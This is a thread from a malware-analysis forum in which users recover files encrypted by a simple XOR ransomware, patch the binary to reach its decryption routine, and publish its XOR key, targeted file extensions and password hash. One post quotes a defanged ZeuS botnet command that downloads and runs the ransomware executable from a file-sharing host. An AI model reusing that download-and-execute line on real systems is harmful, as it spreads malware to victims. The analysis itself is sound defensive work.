A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #12879  by malwarian
 Tue Apr 24, 2012 4:25 pm
One of my customer PC was infected by this rogue which had all file extensions changed to lnk.EnCrYpTeD

I used both dr web tool with -85 and kaspersky tool

dr web tool said that it decrypted 12000 files and kaspersky tool decrypted 6000 files but nothing changed.

Deleted all keys related to EnCrYpTeD in registry still nothing worked :(
 #12890  by Blitskrieg
 Wed Apr 25, 2012 2:57 am
malwarian wrote:One of my customer PC was infected by this rogue which had all file extensions changed to lnk.EnCrYpTeD

I used both dr web tool with -85 and kaspersky tool

dr web tool said that it decrypted 12000 files and kaspersky tool decrypted 6000 files but nothing changed.

Deleted all keys related to EnCrYpTeD in registry still nothing worked :(
Are utilities not decrypted all files or partially? Could you attach 2-3 of problem files?
 #12905  by malwarian
 Wed Apr 25, 2012 5:55 pm
I was able to solve that

Decrypting each of the .lnk.EnCyRpTeD file extracted three files .lnk(0) ,.lnk(1) and the original file.Deleted the other two files ;)

Thanks Blitskrieg for taking time to respond.I dont have the PC now
 #25144  by patriq
 Wed Feb 04, 2015 5:11 am
Generic ransomware pushed to small ZeuS botnet machines by script:

user_execute hxxp://ge.tt/api/1/files/4k8mPe82/0/blob?download >> (informations.exe)
zeus script.png
zeus script.png (835.88 KiB) Viewed 706 times
ec2b6ecfc8ca67f9357b6550166a0838 informations.exe (UPX)
6ec6069728a91a04407283bc6bf208b7 UNPACKED

Some generic ransomware junk..run in VM it asks for a password to decrypt files so I thought I would try to crack.
winxp.png
winxp.png (590.39 KiB) Viewed 706 times

I'm not a great RE like most ppl on here so I gave up and just patched the binary :D

Change 00401C19 > JMP 0040124F (decryption routine)

Attached are samples and patched binary in case anyone needs to unlock stuff... I was surprised, the malware does decrypt everything.. I did not look into the encryption routine or the password too much, but I'm sure someone around here can figure it out.
Attachments
(3.38 MiB) Downloaded 118 times
 #25152  by slipstream-
 Wed Feb 04, 2015 2:09 pm
Decided to do some static analysis, first time on crypto ransomware.

The config is stored in the resources, under BITMAP->14. First 16 bytes are the xor key, the rest is the content, simple decryption - for (int i = 0; i < config_length; i++) config ^= xorkey[i % 16];

Targeted files: *.zip *.rar *.7z *.tar *.gzip *.jpg *.jpeg *.psd *.cdr *.dwg *.max *.bmp *.gif *.png *.doc *.docx *.xls *.xlsx *.ppt *.pptx *.txt *.pdf *.djvu *.mdb *.cer *.pl2 *.pfx *.lcd *.md *.mdf *.dbf *.odt *.vob *.ifo *.lnk *.torrent *.mov *.m2v *.3gp *.mpeg *.mpg *.flv *.avi *.mp4 *.wmv *.divx *.mkv *.mp3 *.wav *.flac *.ape *.wma *.ac3 *.sql *wallet*.dat

After further static analysis, seems it uses the exact same xorkey to decrypt the config as it does to encrypt the files, but this time it does dword xors rather than byte xors.

[ 0x312380da, 0xc9246d86, 0x099f28e8, 0xd48d2804 ]

Valid password is stored in the config, btw. md5(md5(md5(md5(md5(password))))) = cfe27cf06d928fe42d9d8082ad2c9afd
 #25154  by FafZee
 Wed Feb 04, 2015 3:31 pm
Yow,

Xor key : DA 80 23 31 86 6D 24 C9 E8 28 9F 09 04 28 8D D4
start after 20bytes from begin of file.

faf'
 #25155  by patriq
 Wed Feb 04, 2015 4:15 pm
Kaspersky called a similar sample: Trojan-Ransom.Win32.Xorist

String from sample:
0p3nSOurc3 X0r157

I think its just XOR encoding not encryption - as I did see XOR operations in the debugger, i don't recall seeing any Crypto api imports.
Last edited by patriq on Wed Feb 04, 2015 4:23 pm, edited 1 time in total.
 #25157  by FafZee
 Wed Feb 04, 2015 4:18 pm
Sorry for second post, can't edit first :/
Key is hardcoded at 0x557E18 in memory and 0x1c9810 in file.

Faf'
 #25187  by EP_X0FF
 Sat Feb 07, 2015 3:23 am
This is based on the open-source encoder from vazonez script-kiddie. Moved.